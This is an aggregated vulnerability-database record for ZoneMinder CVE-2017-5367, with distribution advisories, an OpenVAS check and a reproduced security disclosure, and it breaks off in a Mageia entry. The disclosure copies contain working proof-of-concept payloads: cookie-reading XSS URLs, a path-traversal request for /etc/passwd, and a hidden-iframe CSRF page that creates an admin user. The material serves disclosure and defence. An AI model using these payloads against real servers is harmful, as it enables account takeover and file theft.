Multiple reflected XSS vulnerabilities exist within form and link input parameters of ZoneMinder v1.30 and v1.29, an open-source CCTV server web application, which allows a remote attacker to execute malicious scripts within an authenticated client's browser. The URL is /zm/index.php and sample parameters could include action=login&view=postlogin[XSS] view=console[XSS] view=groups[XSS] view=events&filter[terms][1][cnj]=and[XSS] view=events&filter%5Bterms%5D%5B1%5D%5Bcnj%5D=and[XSS] view=events&filter%5Bterms%5D%5B1%5D%5Bcnj%5D=[XSS]and view=events&limit=1%22%3E%3C/a%3E[XSS] (among others).
{"debiancve": [{"lastseen": "2023-12-03T18:32:05", "description": "Multiple reflected XSS vulnerabilities exist within form and link input parameters of ZoneMinder v1.30 and v1.29, an open-source CCTV server web application, which allows a remote attacker to execute malicious scripts within an authenticated client's browser. The URL is /zm/index.php and sample parameters could include action=login&view=postlogin[XSS] view=console[XSS] view=groups[XSS] view=events&filter[terms][1][cnj]=and[XSS] view=events&filter%5Bterms%5D%5B1%5D%5Bcnj%5D=and[XSS] view=events&filter%5Bterms%5D%5B1%5D%5Bcnj%5D=[XSS]and view=events&limit=1%22%3E%3C/a%3E[XSS] (among others).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2017-02-06T17:59:00", "type": "debiancve", "title": "CVE-2017-5367", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5367"], "modified": "2017-02-06T17:59:00", "id": "DEBIANCVE:CVE-2017-5367", "href": "https://security-tracker.debian.org/tracker/CVE-2017-5367", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "prion": [{"lastseen": "2023-11-22T03:15:22", "description": "Multiple reflected XSS vulnerabilities exist within form and link input parameters of ZoneMinder v1.30 and v1.29, an open-source CCTV server web application, which allows a remote attacker to execute malicious scripts within an authenticated client's browser. The URL is /zm/index.php and sample parameters could include action=login&view=postlogin[XSS] view=console[XSS] view=groups[XSS] view=events&filter[terms][1][cnj]=and[XSS] view=events&filter%5Bterms%5D%5B1%5D%5Bcnj%5D=and[XSS] view=events&filter%5Bterms%5D%5B1%5D%5Bcnj%5D=[XSS]and view=events&limit=1%22%3E%3C/a%3E[XSS] (among others).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2017-02-06T17:59:00", "type": "prion", "title": "Cross site scripting", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5367"], "modified": "2017-02-10T02:59:00", "id": "PRION:CVE-2017-5367", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2017-5367", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "ubuntucve": [{"lastseen": "2023-12-03T14:45:35", "description": "Multiple reflected XSS vulnerabilities exist within form and link input\nparameters of ZoneMinder v1.30 and v1.29, an open-source CCTV server web\napplication, which allows a remote attacker to execute malicious scripts\nwithin an authenticated client's browser. The URL is /zm/index.php and\nsample parameters could include action=login&view=postlogin[XSS]\nview=console[XSS] view=groups[XSS]\nview=events&filter[terms][1][cnj]=and[XSS]\nview=events&filter%5Bterms%5D%5B1%5D%5Bcnj%5D=and[XSS]\nview=events&filter%5Bterms%5D%5B1%5D%5Bcnj%5D=[XSS]and\nview=events&limit=1%22%3E%3C/a%3E[XSS] (among others).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2017-02-06T00:00:00", "type": "ubuntucve", "title": "CVE-2017-5367", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5367"], "modified": "2017-02-06T00:00:00", "id": "UB:CVE-2017-5367", "href": "https://ubuntu.com/security/CVE-2017-5367", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "cve": [{"lastseen": "2023-12-03T15:29:05", "description": "Multiple reflected XSS vulnerabilities exist within form and link input parameters of ZoneMinder v1.30 and v1.29, an open-source CCTV server web application, which allows a remote attacker to execute malicious scripts within an authenticated client's browser. The URL is /zm/index.php and sample parameters could include action=login&view=postlogin[XSS] view=console[XSS] view=groups[XSS] view=events&filter[terms][1][cnj]=and[XSS] view=events&filter%5Bterms%5D%5B1%5D%5Bcnj%5D=and[XSS] view=events&filter%5Bterms%5D%5B1%5D%5Bcnj%5D=[XSS]and view=events&limit=1%22%3E%3C/a%3E[XSS] (among others).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2017-02-06T17:59:00", "type": "cve", "title": "CVE-2017-5367", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5367"], "modified": "2017-02-10T02:59:00", "cpe": ["cpe:/a:zoneminder:zoneminder:1.29.0", "cpe:/a:zoneminder:zoneminder:1.30.0"], "id": "CVE-2017-5367", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-5367", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:zoneminder:zoneminder:1.29.0:*:*:*:*:*:*:*", "cpe:2.3:a:zoneminder:zoneminder:1.30.0:*:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2020-05-12T17:09:54", "description": "ZoneMinder is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2017-02-06T00:00:00", "type": "openvas", "title": "ZoneMinder Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5368", "CVE-2017-5367", "CVE-2017-5595"], "modified": "2020-05-08T00:00:00", "id": "OPENVAS:1361412562310106564", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310106564", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# ZoneMinder Multiple Vulnerabilities\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:zoneminder:zoneminder\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.106564\");\n script_version(\"2020-05-08T08:34:44+0000\");\n script_tag(name:\"last_modification\", value:\"2020-05-08 08:34:44 +0000 (Fri, 08 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-02-06 09:54:32 +0700 (Mon, 06 Feb 2017)\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n\n script_cve_id(\"CVE-2017-5595\", \"CVE-2017-5367\", \"CVE-2017-5368\");\n\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"ZoneMinder Multiple Vulnerabilities\");\n\n script_category(ACT_ATTACK);\n\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_zoneminder_detect.nasl\", \"os_detection.nasl\");\n script_require_keys(\"Host/runs_unixoide\");\n script_mandatory_keys(\"zoneminder/installed\");\n\n script_tag(name:\"summary\", value:\"ZoneMinder is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Tries to read the /etc/passwd file.\");\n\n script_tag(name:\"insight\", value:\"ZoneMinder is prone to multiple vulnerabilities:\n\n - File disclosure and inclusion vulnerability exists due to unfiltered user-input being passed to readfile() in\n views/file.php which allows an authenticated attacker to read local system files (e.g. /etc/passwd) in the\n context of the web server user (www-data). (CVE-2017-5595)\n\n - Multiple reflected XSS (CVE-2017-5367)\n\n - CSRF vulnerability since no CSRF protection exists across the entire web app. (CVE-2017-5368)\");\n\n script_tag(name:\"impact\", value:\"An unauthenticated remote attacker may read arbitrary files.\");\n\n script_tag(name:\"solution\", value:\"Update to version 1.30.2 or later.\");\n\n script_xref(name:\"URL\", value:\"http://seclists.org/fulldisclosure/2017/Feb/11\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"misc_func.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif (!dir = get_app_location(cpe: CPE, port: port))\n exit(0);\n\nif (dir == \"/\")\n dir = \"\";\n\nfiles = traversal_files(\"linux\");\n\nforeach pattern(keys(files)) {\n\n file = files[pattern];\n\n url = dir + \"/index.php?view=file&path=/../../../../../\" + file;\n\n if (http_vuln_check(port: port, url: url, pattern: pattern, check_header: TRUE)) {\n report = http_report_vuln_url(port: port, url: url);\n security_message(port: port, data: report);\n exit(0);\n }\n}\n\nexit(99);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2018-04-04T23:35:20", "description": "Exploit for php platform in category web applications", "cvss3": {}, "published": "2017-02-05T00:00:00", "type": "zdt", "title": "ZoneMinder - Multiple Vulnerabilities", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-5368", "CVE-2016-10140", "CVE-2017-5367", "CVE-2017-5595"], "modified": "2017-02-05T00:00:00", "id": "1337DAY-ID-26901", "href": "https://0day.today/exploit/description/26901", "sourceData": "==========================================================================\r\nProduct: ZoneMinder\r\nVersions: Multiple versions - see inline\r\nVulnerabilities: File disclosure, XSS, CSRF, Auth bypass & Info disclosure\r\nCVE-IDs: CVE-2017-5595, CVE-2017-5367, CVE-2017-5368, CVE-2016-10140\r\nAuthor: John Marzella\r\nDate: 03/02/2017\r\n==========================================================================\r\n\r\n\r\n\r\nCVE-2016-10140 - Auth bypass and Info disclosure - affects v1.30 and v1.29\r\n==========================================================================\r\nContacted vendor on 08/11/2016\r\n\r\nApache HTTP Server configuration bundled with ZoneMinder allows a remote unauthenticated attacker to browse all directories in the web root, e.g., a remote unauthenticated attacker can view all CCTV images on the server.\r\n\r\nPoC: http://<serverIP>/events\r\n\r\nFix: https://github.com/ZoneMinder/ZoneMinder/commit/71898df7565ed2a51dfe76a1cf30ddb81fc888ba\r\n\r\n\r\n\r\nCVE-2017-5595 - File disclosure - affects v1.xx - code from 2008\r\n================================================================\r\nContacted vendor on 22/01/2017\r\n\r\nFile disclosure and inclusion vulnerability exists in ZoneMinder v1.30.0 due to unfiltered user-input being passed to readfile() in views/file.php which allows an authenticated attacker to read local system files (e.g. /etc/passwd) in the context of the web server user (www-data).\r\n\r\nPoC: http://<serverIP>/zm/index.php?view=file&path=/../../../../../etc/passwd\r\n\r\nFix: https://github.com/ZoneMinder/ZoneMinder/commit/8b19fca9927cdec07cc9dd09bdcf2496a5ae69b3\r\n\r\n\r\n\r\nCVE-2017-5367 - XSS - affects v1.30 and v1.29\r\n=============================================\r\nContacted vendor on 20/11/2016\r\n\r\nMultiple reflected XSS exists.\r\n\r\nThe following has been injected into vulnerable URL\u2019s to show that the users session cookie can be stolen.\r\n%3Cscript%3Ealert(document.cookie);%3C/script%3E\r\n\r\nIn form input view using POST at http://<serverIP>/zm/\r\nPoC: http://<serverIP>/zm/index.php?action=login&view=postlogin%3Cscript%3Ealert(document.cookie);%3C/script%3E&postLoginQuery=1&username=testuser&password=testpassword\r\n\r\nIn link input view using GET at http://<serverIP>/zm/\r\nPoC: http://<serverIP>/zm/?view=groups%3Cscript%3Ealert(document.cookie);%3C/script%3E\r\n\r\nIn link input filter[terms][1][cnj] using GET at http://<serverIP>/zm/\r\nPoC: http://<serverIP>/zm/?view=events&page=1&filter[terms][0][attr]=DateTime&filter[terms][0][op]=%3E%3D&filter[terms][0][val]=-1%2Bhour&filter[terms][1][cnj]=and%3Cscript%3Ealert(document.cookie);%3C/script%3E&filter[terms][1][attr]=MonitorId&filter[terms][1][op]=%3D&filter[terms][1][val]=1\r\n\r\nIn form input view using GET at http://<serverIP>/zm/index.php\r\nPoC: http://<serverIP>/zm/index.php?view=console%3Cscript%3Ealert(document.cookie);%3C/script%3E&action=1&addBtn=Add%20New%20Monitor&editBtn=Edit&deleteBtn=Delete&markMids[]=2\r\n\r\nIn form input filter[terms][1][cnj] using POST at http://<serverIP>/zm/index.php PoC: http://<serverIP>/zm/index.php?view=events&page=1&filter%5Bterms%5D%5B0%5D%5Battr%5D=Archived&filter%5Bterms%5D%5B0%5D%5Bop%5D=%3D&filter%5Bterms%5D%5B0%5D%5Bval%5D=1&filter%5Bterms%5D%5B1%5D%5Bcnj%5D=and%3Cscript%3Ealert(document.cookie);%3C/script%3E&filter%5Bterms%5D%5B1%5D%5Battr%5D=MonitorId&filter%5Bterms%5D%5B1%5D%5Bop%5D=%3D&filter%5Bterms%5D%5B1%5D%5Bval%5D=1\r\n\r\nIn form input filter[terms][1][cnj] using POST at http://<serverIP>/zm/\r\nPoC: http://<serverIP>/zm/?view=events&page=1&filter%5Bterms%5D%5B0%5D%5Battr%5D=DateTime&filter%5Bterms%5D%5B0%5D%5Bop%5D=&filter%5Bterms%5D%5B0%5D%5Bval%5D=-1+hour&filter%5Bterms%5D%5B1%5D%5Bcnj%5D=%3Cscript%3Ealert(document.cookie);%3C/script%3Eand&filter%5Bterms%5D%5B1%5D%5Battr%5D=MonitorId&filter%5Bterms%5D%5B1%5D%5Bop%5D==&filter%5Bterms%5D%5B1%5D%5Bval%5D=1\r\n\r\nIn form input limit using POST at http://<serverIP>/zm/index.php\r\nPoC: http://<serverIP>/zm/index.php?view=events&action=1&page=1&filter[terms][0][attr]=DateTime&filter[terms][0][op]=%3E%3D&filter[terms][0][val]=-1%2Bmonth&sort_field=StartTime&sort_asc=1&limit=1%22%3E%3C/a%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E\r\n\r\nIn link input limit using GET at http://<serverIP>/zm/index.php\r\nPoC: http://<serverIP>/zm/index.php?view=events&page=1&filter%5Bterms%5D%5B0%5D%5Battr%5D=DateTime&filter%5Bterms%5D%5B0%5D%5Bop%5D=%3E%3D&filter%5Bterms%5D%5B0%5D%5Bval%5D=-1%2Bmonth&sort_field=Id&sort_asc=0&limit=1%22%3E%3C/a%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E\r\n\r\nIn form input limit using POST at http://<serverIP>/zm/\r\nPoC: http://<serverIP>/zm/?view=events&action=1&page=1&sort_field=StartTime&sort_asc=1&limit=1%22%3E%3C/a%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E\r\n\r\nIn link input limit using GET at http://<serverIP>/zm/\r\nPoC: http://<serverIP>/zm/?view=events&page=1&sort_field=Id&sort_asc=0&limit=1%22%3E%3C/a%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E\r\n\r\n\r\n\r\nCVE-2017-5368 - CSRF - affects v1.30 and v1.29\r\n==============================================\r\nContacted vendor on 20/11/2016\r\n\r\nNo CSRF protection exists across entire web app.\r\n\r\nPoC: The following html page silently adds a new admin user to Zoneminder if the admin user is already logged in.\r\n\r\ncsrf_poc_addUser.html\r\n\r\n<!-- Example of silent CSRF using iframe -->\r\n<iframe style=\"display:none\" name=\"csrf-frame\"></iframe>\r\n<form method='POST' action=\"http://<serverIP>/zm/index.php\" target=\"csrf-frame\" id=\"csrf-form\">\r\n<input type=\"hidden\" name=\"view\" value=\"user\"/>\r\n<input type=\"hidden\" name=\"action\" value=\"user\"/>\r\n<input type=\"hidden\" name=\"uid\" value=\"0\"/>\r\n<input type=\"hidden\" name=\"newUser[MonitorIds]\" value=\"\"/>\r\n<input type=\"hidden\" name=\"newUser[Username]\" value=\"attacker1\"/>\r\n<input type=\"hidden\" name=\"newUser[Password]\" value=\"Password1234\"/>\r\n<input type=\"hidden\" name=\"conf_password\" value=\"Password1234\"/>\r\n<input type=\"hidden\" name=\"newUser[Language]\" value=\"en_gb\"/>\r\n<input type=\"hidden\" name=\"newUser[Enabled]\" value=\"1\"/>\r\n<input type=\"hidden\" name=\"newUser[Stream]\" value=\"View\"/>\r\n<input type=\"hidden\" name=\"newUser[Events]\" value=\"Edit\"/>\r\n<input type=\"hidden\" name=\"newUser[Control]\" value=\"Edit\"/>\r\n<input type=\"hidden\" name=\"newUser[Monitors]\" value=\"Edit\"/>\r\n<input type=\"hidden\" name=\"newUser[Groups]\" value=\"Edit\"/>\r\n<input type=\"hidden\" name=\"newUser[System]\" value=\"Edit\"/>\r\n<input type=\"hidden\" name=\"newUser[MaxBandwidth]\" value=\"high\"/>\r\n</form>\r\n<script>document.getElementById(\"csrf-form\").submit()</script>\n\n# 0day.today [2018-04-04] #", "sourceHref": "https://0day.today/exploit/26901", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "packetstorm": [{"lastseen": "2017-02-08T05:04:31", "description": "", "cvss3": {}, "published": "2017-02-06T00:00:00", "type": "packetstorm", "title": "ZoneMinder XSS / CSRF / File Disclosure / Authentication Bypass", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-5368", "CVE-2016-10140", "CVE-2017-5367", "CVE-2017-5595"], "modified": "2017-02-06T00:00:00", "id": "PACKETSTORM:140927", "href": "https://packetstormsecurity.com/files/140927/ZoneMinder-XSS-CSRF-File-Disclosure-Authentication-Bypass.html", "sourceData": "`========================================================================== \nProduct: ZoneMinder \nVersions: Multiple versions - see inline \nVulnerabilities: File disclosure, XSS, CSRF, Auth bypass & Info disclosure \nCVE-IDs: CVE-2017-5595, CVE-2017-5367, CVE-2017-5368, CVE-2016-10140 \nAuthor: John Marzella \nDate: 03/02/2017 \n========================================================================== \n \n \n \nCVE-2016-10140 - Auth bypass and Info disclosure - affects v1.30 and v1.29 \n========================================================================== \nContacted vendor on 08/11/2016 \n \nApache HTTP Server configuration bundled with ZoneMinder allows a remote unauthenticated attacker to browse all directories \nin the web root, e.g., a remote unauthenticated attacker can view all CCTV images on the server. \n \nPoC: http://<serverIP>/events \n \nFix: https://github.com/ZoneMinder/ZoneMinder/commit/71898df7565ed2a51dfe76a1cf30ddb81fc888ba \n \n \n \nCVE-2017-5595 - File disclosure - affects v1.xx - code from 2008 \n================================================================ \nContacted vendor on 22/01/2017 \n \nFile disclosure and inclusion vulnerability exists in ZoneMinder v1.30.0 due to unfiltered user-input being passed to readfile() in views/file.php which allows an authenticated attacker to read local system files (e.g. /etc/passwd) in the context of the web server user (www-data). \n \nPoC: http://<serverIP>/zm/index.php?view=file&path=/../../../../../etc/passwd \n \nFix: https://github.com/ZoneMinder/ZoneMinder/commit/8b19fca9927cdec07cc9dd09bdcf2496a5ae69b3 \n \n \n \nCVE-2017-5367 - XSS - affects v1.30 and v1.29 \n============================================= \nContacted vendor on 20/11/2016 \n \nMultiple reflected XSS exists. \n \nThe following has been injected into vulnerable URLas to show that the users session cookie can be stolen. \n%3Cscript%3Ealert(document.cookie);%3C/script%3E \n \nIn form input view using POST at http://<serverIP>/zm/ \nPoC: http://<serverIP>/zm/index.php?action=login&view=postlogin%3Cscript%3Ealert(document.cookie);%3C/script%3E&postLoginQuery=1&username=testuser&password=testpassword \n \nIn link input view using GET at http://<serverIP>/zm/ \nPoC: http://<serverIP>/zm/?view=groups%3Cscript%3Ealert(document.cookie);%3C/script%3E \n \nIn link input filter[terms][1][cnj] using GET at http://<serverIP>/zm/ \nPoC: http://<serverIP>/zm/?view=events&page=1&filter[terms][0][attr]=DateTime&filter[terms][0][op]=%3E%3D&filter[terms][0][val]=-1%2Bhour&filter[terms][1][cnj]=and%3Cscript%3Ealert(document.cookie);%3C/script%3E&filter[terms][1][attr]=MonitorId&filter[terms][1][op]=%3D&filter[terms][1][val]=1 \n \nIn form input view using GET at http://<serverIP>/zm/index.php \nPoC: http://<serverIP>/zm/index.php?view=console%3Cscript%3Ealert(document.cookie);%3C/script%3E&action=1&addBtn=Add%20New%20Monitor&editBtn=Edit&deleteBtn=Delete&markMids[]=2 \n \nIn form input filter[terms][1][cnj] using POST at http://<serverIP>/zm/index.php \nPoC: http://<serverIP>/zm/index.php?view=events&page=1&filter%5Bterms%5D%5B0%5D%5Battr%5D=Archived&filter%5Bterms%5D%5B0%5D%5Bop%5D=%3D&filter%5Bterms%5D%5B0%5D%5Bval%5D=1&filter%5Bterms%5D%5B1%5D%5Bcnj%5D=and%3Cscript%3Ealert(document.cookie);%3C/script%3E&filter%5Bterms%5D%5B1%5D%5Battr%5D=MonitorId&filter%5Bterms%5D%5B1%5D%5Bop%5D=%3D&filter%5Bterms%5D%5B1%5D%5Bval%5D=1 \n \nIn form input filter[terms][1][cnj] using POST at http://<serverIP>/zm/ \nPoC: http://<serverIP>/zm/?view=events&page=1&filter%5Bterms%5D%5B0%5D%5Battr%5D=DateTime&filter%5Bterms%5D%5B0%5D%5Bop%5D=&filter%5Bterms%5D%5B0%5D%5Bval%5D=-1+hour&filter%5Bterms%5D%5B1%5D%5Bcnj%5D=%3Cscript%3Ealert(document.cookie);%3C/script%3Eand&filter%5Bterms%5D%5B1%5D%5Battr%5D=MonitorId&filter%5Bterms%5D%5B1%5D%5Bop%5D==&filter%5Bterms%5D%5B1%5D%5Bval%5D=1 \n \nIn form input limit using POST at http://<serverIP>/zm/index.php \nPoC: http://<serverIP>/zm/index.php?view=events&action=1&page=1&filter[terms][0][attr]=DateTime&filter[terms][0][op]=%3E%3D&filter[terms][0][val]=-1%2Bmonth&sort_field=StartTime&sort_asc=1&limit=1%22%3E%3C/a%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E \n \nIn link input limit using GET at http://<serverIP>/zm/index.php \nPoC: http://<serverIP>/zm/index.php?view=events&page=1&filter%5Bterms%5D%5B0%5D%5Battr%5D=DateTime&filter%5Bterms%5D%5B0%5D%5Bop%5D=%3E%3D&filter%5Bterms%5D%5B0%5D%5Bval%5D=-1%2Bmonth&sort_field=Id&sort_asc=0&limit=1%22%3E%3C/a%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E \n \nIn form input limit using POST at http://<serverIP>/zm/ \nPoC: http://<serverIP>/zm/?view=events&action=1&page=1&sort_field=StartTime&sort_asc=1&limit=1%22%3E%3C/a%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E \n \nIn link input limit using GET at http://<serverIP>/zm/ \nPoC: http://<serverIP>/zm/?view=events&page=1&sort_field=Id&sort_asc=0&limit=1%22%3E%3C/a%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E \n \n \n \nCVE-2017-5368 - CSRF - affects v1.30 and v1.29 \n============================================== \nContacted vendor on 20/11/2016 \n \nNo CSRF protection exists across entire web app. \n \nPoC: The following html page silently adds a new admin user to Zoneminder if the admin user is already logged in. \n \ncsrf_poc_addUser.html \n \n<!-- Example of silent CSRF using iframe --> \n<iframe style=\"display:none\" name=\"csrf-frame\"></iframe> \n<form method='POST' action=\"http://<serverIP>/zm/index.php\" target=\"csrf-frame\" id=\"csrf-form\"> \n<input type=\"hidden\" name=\"view\" value=\"user\"/> \n<input type=\"hidden\" name=\"action\" value=\"user\"/> \n<input type=\"hidden\" name=\"uid\" value=\"0\"/> \n<input type=\"hidden\" name=\"newUser[MonitorIds]\" value=\"\"/> \n<input type=\"hidden\" name=\"newUser[Username]\" value=\"attacker1\"/> \n<input type=\"hidden\" name=\"newUser[Password]\" value=\"Password1234\"/> \n<input type=\"hidden\" name=\"conf_password\" value=\"Password1234\"/> \n<input type=\"hidden\" name=\"newUser[Language]\" value=\"en_gb\"/> \n<input type=\"hidden\" name=\"newUser[Enabled]\" value=\"1\"/> \n<input type=\"hidden\" name=\"newUser[Stream]\" value=\"View\"/> \n<input type=\"hidden\" name=\"newUser[Events]\" value=\"Edit\"/> \n<input type=\"hidden\" name=\"newUser[Control]\" value=\"Edit\"/> \n<input type=\"hidden\" name=\"newUser[Monitors]\" value=\"Edit\"/> \n<input type=\"hidden\" name=\"newUser[Groups]\" value=\"Edit\"/> \n<input type=\"hidden\" name=\"newUser[System]\" value=\"Edit\"/> \n<input type=\"hidden\" name=\"newUser[MaxBandwidth]\" value=\"high\"/> \n</form> \n<script>document.getElementById(\"csrf-form\").submit()</script> \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/140927/zoneminder_03022017.txt", "cvss": {"score": 0.0, "vector": "NONE"}}], "mageia": [{"lastseen": "2023-12-03T17:33:21", "description": "This update fixes the following security issues: Information disclosure and authentication bypass vulnerability exists in the Apache HTTP Server configuration bundled with ZoneMinder v1.30 and v1.29, which allows a remote unauthenticated attacker to browse all directories in the web root, e.g., a remote unauthenticated attacker can view all CCTV images on the server via the /events URI. (CVE-2016-10140) Cross-site scripting (XSS) vulnerability in Zoneminder 1.30 and earlier allows remote attackers to inject arbitrary web script or HTML via the format parameter in a download log request to index.php. (CVE-2016-10201) Cross-site scripting (XSS) vulnerability in Zoneminder 1.30 and earlier allows remote attackers to inject arbitrary web script or HTML via the path info to index.php. (CVE-2016-10202) Cross-site scripting (XSS) vulnerability in Zoneminder 1.30 and earlier allows remote attackers to inject arbitrary web script or HTML via the name when creating a new monitor. (CVE-2016-10203) SQL injection vulnerability in Zoneminder 1.30 and earlier allows remote attackers to execute arbitrary SQL commands via the limit parameter in a log query request to index.php. (CVE-2016-10204) Session fixation vulnerability in Zoneminder 1.30 and earlier allows remote attackers to hijack web sessions via the ZMSESSID cookie. (CVE-2016-10205) Cross-site request forgery (CSRF) vulnerability in Zoneminder 1.30 and earlier allows remote attackers to hijack the authentication of users for requests that change passwords and possibly have unspecified other impact as demonstrated by a crafted user action request to index.php. (CVE-2016-10206) Multiple reflected XSS vulnerabilities exist within form and link input parameters of ZoneMinder v1.30 and v1.29, an open-source CCTV server web application, which allows a remote attacker to execute malicious scripts within an authenticated client's browser. The URL is /zm/index.php and sample parameters could include action=login&view;=postlogin[XSS] view=console[XSS] view=groups[XSS] 